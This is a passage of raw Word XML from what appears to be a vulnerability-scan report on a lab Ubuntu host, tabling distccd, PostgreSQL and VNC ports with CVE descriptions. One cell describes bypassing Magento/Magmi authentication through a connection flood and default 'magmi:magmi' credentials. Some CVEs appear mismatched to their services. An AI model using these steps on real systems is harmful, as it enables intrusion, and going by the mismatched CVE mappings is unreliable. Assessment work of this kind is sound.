              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>MySQL (blocked - too many connection errors)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0F7579D7" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2020-5777,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2018-7251</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="28CFD438" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">This can be done by sending at least 151 simultaneous requests to the Magento website to trigger a "Too many connections" error, then use default </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>magmi:magmi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> basic authentication to remotely bypass authentication.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="28AFD1EB" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3EA2A2E7" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0050550F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>3632</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="24DBCB76" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>distccd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1F192B63" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>distccd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="23A23BB3" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2012-3955,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2012-3571</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="21D9077D" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">ISC DHCP 4.1.x before 4.1-ESV-R7 and 4.2.x before 4.2.4-P2 allows remote attackers to cause a denial of service (daemon crash) in opportunistic circumstances by establishing an IPv6 lease in an environment where the lease expiration time is later reduced. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E010880" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">ISC DHCP 4.1.2 through 4.2.4 and 4.1-ESV before 4.1-ESV-R6 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed client identifier. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="3027AB73" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7C14FFC8" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4CA58C93" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>5432</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="060EB30E" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ssl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-cert: Subject: commonName=ubuntu804-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>base.localdomain</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>countryName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>=XX</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CF7D6C8" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>| Not valid before: 2010-03-17T14:07:45</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AF7A76C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">|_Not valid </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>after:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  2010-04-16T14:07:45</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19DEC250" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|_</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ssl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-date: 2024-05-19T16:29:03+00:00; +2s from scanner time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="11D13601" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>postgresql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="22118E05" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>PostgreSQL DB 8.3.0 - 8.3.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="16821E80" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2019-16387,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2009-0922</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="18D8CF52" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">PostgreSQL before 8.3.7, 8.2.13, 8.1.17, 8.0.21, and 7.4.25 allows remote authenticated users to cause a denial of service (stack consumption and crash) by triggering a failure in the conversion of a localized error message to a client-specified encoding, as demonstrated using mismatched encoding conversion requests. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="509646D1" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>** DISPUTED ** PEGA Platform 8.3.0 is vulnerable to a direct prweb/sso/random_token</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/!STANDARD</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">?pyActivity=Data-Admin-DB-Name.DBSchema_ListDatabases request while using a low-privilege account. (This can perform actions and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">retrieve data that only an administrator should have access to.) NOTE: The vendor states that this vulnerability was discovered using an administrator account and they are normal administrator functions. Therefore, the claim that the CVE was done with a low privilege account is incorrect. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="04BA67A8" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7CE9275A" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="179799F7" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>5900</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2DFA4C5C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>vnc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="76501EAA" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>VNC (protocol 3.3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
